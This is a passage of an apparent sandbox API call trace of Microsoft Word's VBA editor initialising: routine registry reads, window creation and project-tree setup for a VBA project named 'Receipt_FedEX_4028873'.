lpData=0x185fa0, lpcbData=0x185f90*=0x28 | out: lpType=0x0, lpData=0x185fa0*=0x0, lpcbData=0x185f90*=0x28) returned 0x2 [0041.480] RegCloseKey (hKey=0xa24) returned 0x0 [0041.480] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x82b, lpBuffer=0x186000, cchBufferMax=40 | out: lpBuffer="CollapseWindows") returned 0xf [0041.480] lstrcpyA (in: lpString1=0x185e00, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.480] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.480] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.480] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185f98 | out: phkResult=0x185f98*=0xa24) returned 0x0 [0041.480] RegQueryValueExA (in: hKey=0xa24, lpValueName="CollapseWindows", lpReserved=0x0, lpType=0x0, lpData=0x185fa0, lpcbData=0x185f90*=0x28 | out: lpType=0x0, lpData=0x185fa0*=0x0, lpcbData=0x185f90*=0x28) returned 0x2 [0041.480] RegCloseKey (hKey=0xa24) returned 0x0 [0041.481] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x813, lpBuffer=0x186000, cchBufferMax=40 | out: lpBuffer="UpgradeVBX") returned 0xa [0041.481] lstrcpyA (in: lpString1=0x185e00, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.481] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.481] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.481] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185f98 | out: phkResult=0x185f98*=0xa24) returned 0x0 [0041.481] RegQueryValueExA (in: hKey=0xa24, lpValueName="UpgradeVBX", lpReserved=0x0, lpType=0x0, lpData=0x185fa0, lpcbData=0x185f90*=0x28 | out: lpType=0x0, lpData=0x185fa0*=0x0, lpcbData=0x185f90*=0x28) returned 0x2 [0041.482] RegCloseKey (hKey=0xa24) returned 0x0 [0041.482] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x833, lpBuffer=0x186000, cchBufferMax=40 | out: lpBuffer="ReadOnlyMode") returned 0xc [0041.482] lstrcpyA (in: lpString1=0x185e00, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.482] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.482] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.482] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185f98 | out: phkResult=0x185f98*=0xa24) returned 0x0 [0041.482] RegQueryValueExA (in: hKey=0xa24, lpValueName="ReadOnlyMode", lpReserved=0x0, lpType=0x0, lpData=0x185fa0, lpcbData=0x185f90*=0x28 | out: lpType=0x0, lpData=0x185fa0*=0x0, lpcbData=0x185f90*=0x28) returned 0x2 [0041.482] RegCloseKey (hKey=0xa24) returned 0x0 [0041.482] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x80c, lpBuffer=0x186000, cchBufferMax=40 | out: lpBuffer="BackgroundProjectLoad") returned 0x15 [0041.482] lstrcpyA (in: lpString1=0x185e00, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.482] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.482] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.482] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185f98 | out: phkResult=0x185f98*=0xa24) returned 0x0 [0041.482] RegQueryValueExA (in: hKey=0xa24, lpValueName="BackgroundProjectLoad", lpReserved=0x0, lpType=0x0, lpData=0x185fa0, lpcbData=0x185f90*=0x28 | out: lpType=0x0, lpData=0x185fa0*=0x0, lpcbData=0x185f90*=0x28) returned 0x2 [0041.482] RegCloseKey (hKey=0xa24) returned 0x0 [0041.482] RegisterClipboardFormatA (lpszFormat="VB ProjectExplorer Item") returned 0xc19d [0041.482] RegisterClipboardFormatA (lpszFormat="VBProjWin_CF_HDROP") returned 0xc19e [0041.483] RegisterClipboardFormatA (lpszFormat="FileContents") returned 0xc0c3 [0041.483] RegisterClipboardFormatA (lpszFormat="FileGroupDescriptor") returned 0xc0c4 [0041.483] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0041.483] RegisterClassA (lpWndClass=0x185fe0) returned 0x5a70182c19f [0041.483] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001b7) returned 1 [0041.483] GetDC (hWnd=0x0) returned 0x1801025d [0041.483] GetDeviceCaps (hdc=0x1801025d, index=88) returned 96 [0041.483] DeleteDC (hdc=0x1801025d) returned 1 [0041.483] GetDC (hWnd=0x0) returned 0x1801025d [0041.483] GetDeviceCaps (hdc=0x1801025d, index=88) returned 96 [0041.483] DeleteDC (hdc=0x1801025d) returned 1 [0041.483] GetDC (hWnd=0x0) returned 0x1801025d [0041.483] GetDeviceCaps (hdc=0x1801025d, index=90) returned 96 [0041.483] DeleteDC (hdc=0x1801025d) returned 1 [0041.483] LoadImageA (hInst=0x7fee4230000, name=0x1770, type=0x0, cx=0, cy=0, fuLoad=0x0) returned 0x40508a0 [0041.484] GetObjectA (in: h=0x40508a0, c=32, pv=0x185f50 | out: pv=0x185f50) returned 32 [0041.484] ImageList_LoadImageA (hi=0x7fee4230000, lpbmp=0x1770, cx=16, cGrow=1, crMask=0xffffff, uType=0x0, uFlags=0x0) returned 0x32f4a0 [0041.487] DeleteObject (ho=0x40508a0) returned 1 [0041.487] ImageList_SetOverlayImage (himl=0x32f4a0, iImage=1, iOverlay=1) returned 1 [0041.487] ImageList_SetOverlayImage (himl=0x32f4a0, iImage=2, iOverlay=2) returned 1 [0041.487] CreateWindowExA (dwExStyle=0x10, lpClassName=0xc19f, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=100, nHeight=100, hWndParent=0x10202, hMenu=0x0, hInstance=0x7fee4230000, lpParam=0x0) returned 0x10208 [0041.487] CreateWindowExA (dwExStyle=0x200, lpClassName="SysTreeView32", lpWindowName=0x0, dwStyle=0x508000af, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x10208, hMenu=0x1, hInstance=0x7fee4230000, lpParam=0x0) returned 0x1020a [0041.517] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001b9) returned 1 [0041.517] SendMessageA (hWnd=0x1020a, Msg=0x1109, wParam=0x0, lParam=0x32f4a0) returned 0x0 [0041.517] GetSystemDefaultLangID () returned 0x320409 [0041.518] CreateFontIndirectA (lplf=0x185440) returned 0x20a08b1 [0041.518] CreateFontIndirectA (lplf=0x185440) returned 0x30a08b2 [0041.518] SendMessageA (hWnd=0x1020a, Msg=0x30, wParam=0x30a08b2, lParam=0x0) returned 0x0 [0041.519] RegisterDragDrop (hwnd=0x1020a, pDropTarget=0x274eec8) returned 0x0 [0041.519] SetWindowLongPtrA (hWnd=0x1020a, nIndex=-4, dwNewLong=0x7fee4240f00) returned 0xffff0207 [0041.519] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", ulOptions=0x0, samDesired=0x1, phkResult=0x185420 | out: phkResult=0x185420*=0xa24) returned 0x0 [0041.520] RegQueryValueExA (in: hKey=0xa24, lpValueName="VbaCapability", lpReserved=0x0, lpType=0x0, lpData=0x185418, lpcbData=0x185410*=0x4 | out: lpType=0x0, lpData=0x185418*=0x1, lpcbData=0x185410*=0x4) returned 0x2 [0041.520] RegCloseKey (hKey=0xa24) returned 0x0 [0041.520] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x3346, lpBuffer=0x184b90, cchBufferMax=1024 | out: lpBuffer="Project") returned 0x7 [0041.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x185060, cbMultiByte=-1, lpWideCharStr=0x68f0158, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0041.520] CoCreateInstance (in: rclsid=0x7fee45ec298*(Data1=0xb5f8350b, Data2=0x548, Data3=0x48b1, Data4=([0]=0xa6, [1]=0xee, [2]=0x88, [3]=0xbd, [4]=0x0, [5]=0xb4, [6]=0xa5, [7]=0xe7)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fee45ec288*(Data1=0x6e26e776, Data2=0x4f0, Data3=0x495d, Data4=([0]=0x80, [1]=0xe4, [2]=0x33, [3]=0x30, [4]=0x35, [5]=0x2e, [6]=0x31, [7]=0x69)), ppv=0x185458 | out: ppv=0x185458*=0x6c32810) returned 0x0 [0041.530] CAccPropServices:IAccPropServices:SetHwndPropStr (This=0x6c32810, hwnd=0x1020a, idObject=0xfffffffc, idChild=0x0, idProp=0x185460, str="Project") returned 0x0 [0041.530] CAccPropServices:IUnknown:Release (This=0x6c32810) returned 0x0 [0041.531] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001b8) returned 1 [0041.531] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x856, lpBuffer=0x186000, cchBufferMax=40 | out: lpBuffer="FolderView") returned 0xa [0041.531] lstrcpyA (in: lpString1=0x185e00, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.531] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.531] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.531] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185f98 | out: phkResult=0x185f98*=0xa18) returned 0x0 [0041.531] RegQueryValueExA (in: hKey=0xa18, lpValueName="FolderView", lpReserved=0x0, lpType=0x0, lpData=0x185fa0, lpcbData=0x185f90*=0x28 | out: lpType=0x0, lpData=0x185fa0*=0x0, lpcbData=0x185f90*=0x28) returned 0x2 [0041.531] RegCloseKey (hKey=0xa18) returned 0x0 [0041.531] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x3346, lpBuffer=0x183bb0, cchBufferMax=512 | out: lpBuffer="Project") returned 0x7 [0041.531] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x3347, lpBuffer=0x183bb0, cchBufferMax=512 | out: lpBuffer="No Open Projects") returned 0x10 [0041.532] strcpy_s (in: _Dst=0x185e10, _DstSize=0x208, _Src="No Open Projects" | out: _Dst="No Open Projects") returned 0x0 [0041.532] lstrcpyA (in: lpString1=0x185c00, lpString2="Project" | out: lpString1="Project") returned="Project" [0041.532] lstrcatA (in: lpString1="Project", lpString2=" - " | out: lpString1="Project - ") returned="Project - " [0041.532] lstrcatA (in: lpString1="Project - ", lpString2="No Open Projects" | out: lpString1="Project - No Open Projects") returned="Project - No Open Projects" [0041.532] SetWindowTextA (hWnd=0x10208, lpString="Project - No Open Projects") returned 1 [0041.532] SendMessageA (hWnd=0x1020a, Msg=0x1100, wParam=0x0, lParam=0x185d70) returned 0x6a68e80 [0041.538] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0041.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0041.538] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0041.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=8, lpWideCharStr=0x68e8c88, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0041.538] lstrcatA (in: lpString1="Project", lpString2=" (" | out: lpString1="Project (") returned="Project (" [0041.538] strncat_s (in: _Destination="Project (", _SizeInBytes=0x187, _Source="Receipt_FedEX_4028873", _MaxCount=0x28 | out: _Destination="Project (Receipt_FedEX_4028873") returned 0x0 [0041.538] lstrcatA (in: lpString1="Project (Receipt_FedEX_4028873", lpString2=")" | out: lpString1="Project (Receipt_FedEX_4028873)") returned="Project (Receipt_FedEX_4028873)" [0041.538] SendMessageA (hWnd=0x1020a, Msg=0x110d, wParam=0x0, lParam=0x185ab0) returned 0x1 [0041.541] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185ae8 | out: lpsi=0x185ae8) returned 1 [0041.541] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x3, lParam=0x6a68e80) returned 0x0 [0041.541] SendMessageA (hWnd=0x1020a, Msg=0x1113, wParam=0x0, lParam=0x0) returned 0x1 [0041.541] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185b08 | out: lpsi=0x185b08) returned 1 [0041.541] SendMessageA (hWnd=0x1020a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0041.541] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0041.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0041.541] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0041.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=8, lpWideCharStr=0x68e8c88, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0041.541] lstrcpyA (in: lpString1=0x185720, lpString2="Project" | out: lpString1="Project") returned="Project" [0041.541] lstrcatA (in: lpString1="Project", lpString2=" - " | out: lpString1="Project - ") returned="Project - " [0041.541] lstrcatA (in: lpString1="Project - ", lpString2="Project" | out: lpString1="Project - Project") returned="Project - Project" [0041.541] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0041.541] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=7, lpWideCharStr=0x68e8c88, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.541] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x3354, lpBuffer=0x1834d0, cchBufferMax=512 | out: lpBuffer="running") returned 0x7 [0041.542] strcpy_s (in: _Dst=0x185730, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0041.542] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0041.542] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0041.542] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - Normal", _SizeInBytes=0x410, _Source=" [" | out: _Destination="Microsoft Visual Basic for Applications - Normal [") returned 0x0 [0041.542] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - Normal [", _SizeInBytes=0x410, _Source="running" | out: _Destination="Microsoft Visual Basic for Applications - Normal [running") returned 0x0 [0041.542] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - Normal [running", _SizeInBytes=0x410, _Source="]" | out: _Destination="Microsoft Visual Basic for Applications - Normal [running]") returned 0x0 [0041.542] SetWindowTextA (hWnd=0x10202, lpString="Microsoft Visual Basic for Applications - Normal [running]") returned 1 [0041.542] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x4, lParam=0x6a68e80) returned 0x0 [0041.542] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x4, lParam=0x0) returned 0x6a68e80 [0041.542] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x185ae0) returned 0x1 [0041.542] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x1, lParam=0x6a68e80) returned 0x0 [0041.542] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x7ee, lpBuffer=0x185c00, cchBufferMax=256 | out: lpBuffer="Objects") returned 0x7 [0041.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Microsoft Word", cchWideChar=-1, lpMultiByteStr=0x185a20, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Word", lpUsedDefaultChar=0x0) returned 15 [0041.542] lstrcpyA (in: lpString1=0x185b00, lpString2="Microsoft Word" | out: lpString1="Microsoft Word") returned="Microsoft Word" [0041.542] lstrcatA (in: lpString1="Microsoft Word", lpString2=" " | out: lpString1="Microsoft Word ") returned="Microsoft Word " [0041.542] lstrcatA (in: lpString1="Microsoft Word ", lpString2="Objects" | out: lpString1="Microsoft Word Objects") returned="Microsoft Word Objects" [0041.542] SendMessageA (hWnd=0x1020a, Msg=0x110d, wParam=0x0, lParam=0x185950) returned 0x1 [0041.543] GetObjectA (in: h=0x50508b3, c=32, pv=0x185c60 | out: pv=0x185c60) returned 32 [0041.543] GetDC (hWnd=0x0) returned 0x1801025d [0041.543] GetDeviceCaps (hdc=0x1801025d, index=90) returned 96 [0041.543] DeleteDC (hdc=0x1801025d) returned 1 [0041.543] GetDC (hWnd=0x0) returned 0x1801025d [0041.543] GetDeviceCaps (hdc=0x1801025d, index=88) returned 96 [0041.543] DeleteDC (hdc=0x1801025d) returned 1 [0041.543] GetObjectA (in: h=0x50508b3, c=32, pv=0x185bd0 | out: pv=0x185bd0) returned 32 [0041.543] ImageList_AddMasked (himl=0x32f4a0, hbmImage=0x50508b3, crMask=0xff00ff) returned 20 [0041.544] SendMessageA (hWnd=0x1020a, Msg=0x1100, wParam=0x0, lParam=0x185d70) returned 0x6a68ee0 [0041.544] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185ae8 | out: lpsi=0x185ae8) returned 1 [0041.544] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x3, lParam=0x6a68ee0) returned 0x6a67800 [0041.544] SendMessageA (hWnd=0x1020a, Msg=0x1113, wParam=0x0, lParam=0x6a67800) returned 0x1 [0041.544] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185b08 | out: lpsi=0x185b08) returned 1 [0041.544] SendMessageA (hWnd=0x1020a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0041.544] SendMessageA (hWnd=0x10204, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10206 [0041.544] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x7e9, lpBuffer=0x185b00, cchBufferMax=256 | out: lpBuffer="Forms") returned 0x5 [0041.544] SendMessageA (hWnd=0x1020a, Msg=0x110d, wParam=0x0, lParam=0x185970) returned 0x1 [0041.544] SendMessageA (hWnd=0x1020a, Msg=0x1100, wParam=0x0, lParam=0x185d70) returned 0x6a68fa0 [0041.544] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185ae8 | out: lpsi=0x185ae8) returned 1 [0041.544] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x3, lParam=0x6a68fa0) returned 0x6a68f40 [0041.544] SendMessageA (hWnd=0x1020a, Msg=0x1113, wParam=0x0, lParam=0x6a68f40) returned 0x1 [0041.545] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185b08 | out: lpsi=0x185b08) returned 1 [0041.545] SendMessageA (hWnd=0x1020a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0041.545] SendMessageA (hWnd=0x10204, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10206 [0041.545] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x7ea, lpBuffer=0x185b00, cchBufferMax=256 | out: lpBuffer="Modules") returned 0x7 [0041.545] SendMessageA (hWnd=0x1020a, Msg=0x110d, wParam=0x0, lParam=0x185970) returned 0x1 [0041.545] SendMessageA (hWnd=0x1020a, Msg=0x1100, wParam=0x0, lParam=0x185d70) returned 0x6a69060 [0041.545] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185ae8 | out: lpsi=0x185ae8) returned 1 [0041.545] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x3, lParam=0x6a69060) returned 0x6a69000 [0041.545] SendMessageA (hWnd=0x1020a, Msg=0x1113, wParam=0x0, lParam=0x6a69000) returned 0x1 [0041.545] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185b08 | out: lpsi=0x185b08) returned 1 [0041.545] SendMessageA (hWnd=0x1020a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0041.545] SendMessageA (hWnd=0x10204, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10206 [0041.545] SendMessageA (hWnd=0x1020a, Msg=0x1100, wParam=0x0, lParam=0x185d70) returned 0x6a690c0 [0041.547] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0041.547] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=7, lpWideCharStr=0x68e8c88, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.547] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185ae8 | out: lpsi=0x185ae8) returned 1 [0041.547] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x3, lParam=0x6a690c0) returned 0x0 [0041.547] SendMessageA (hWnd=0x1020a, Msg=0x1113, wParam=0x0, lParam=0x0) returned 0x1 [0041.547] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185b08 | out: lpsi=0x185b08) returned 1 [0041.547] SendMessageA (hWnd=0x1020a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0041.547] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0041.547] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=7, lpWideCharStr=0x68e8c88, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.548] lstrcpyA (in: lpString1=0x185720, lpString2="Project" | out: lpString1="Project") returned="Project" [0041.548] lstrcatA (in: lpString1="Project", lpString2=" - " | out: lpString1="Project - ") returned="Project - " [0041.548] lstrcatA (in: lpString1="Project - ", lpString2="Normal" | out: lpString1="Project - Normal") returned="Project - Normal" [0041.548] SetWindowTextA (hWnd=0x10208, lpString="Project - Normal") returned 1 [0041.548] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0041.548] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=7, lpWideCharStr=0x68e8c88, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.548] strcpy_s (in: _Dst=0x185730, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0041.548] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0041.548] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0041.548] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - Normal", _SizeInBytes=0x410, _Source=" [" | out: _Destination="Microsoft Visual Basic for Applications - Normal [") returned 0x0 [0041.548] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - Normal [", _SizeInBytes=0x410, _Source="running" | out: _Destination="Microsoft Visual Basic for Applications - Normal [running") returned 0x0 [0041.548] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - Normal [running", _SizeInBytes=0x410, _Source="]" | out: _Destination="Microsoft Visual Basic for Applications - Normal [running]") returned 0x0 [0041.548] SetWindowTextA (hWnd=0x10202, lpString="Microsoft Visual Basic for Applications - Normal [running]") returned 1 [0041.548] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x4, lParam=0x6a68e80) returned 0x6a67800 [0041.548] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x185ae0) returned 0x1 [0041.548] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x1, lParam=0x6a67800) returned 0x6a68f40 [0041.548] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x185ae0) returned 0x1 [0041.548] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x1, lParam=0x6a68f40) returned 0x6a69000 [0041.548] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x185ae0) returned 0x1 [0041.548] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x1, lParam=0x6a69000) returned 0x0 [0041.548] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x4, lParam=0x6a690c0) returned 0x0 [0041.549] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x7ee, lpBuffer=0x185c00, cchBufferMax=256 | out: lpBuffer="Objects") returned 0x7 [0041.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Microsoft Word", cchWideChar=-1, lpMultiByteStr=0x185a20, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Word", lpUsedDefaultChar=0x0) returned 15 [0041.549] lstrcpyA (in: lpString1=0x185b00, lpString2="Microsoft Word" | out: lpString1="Microsoft Word") returned="Microsoft Word" [0041.549] lstrcatA (in: 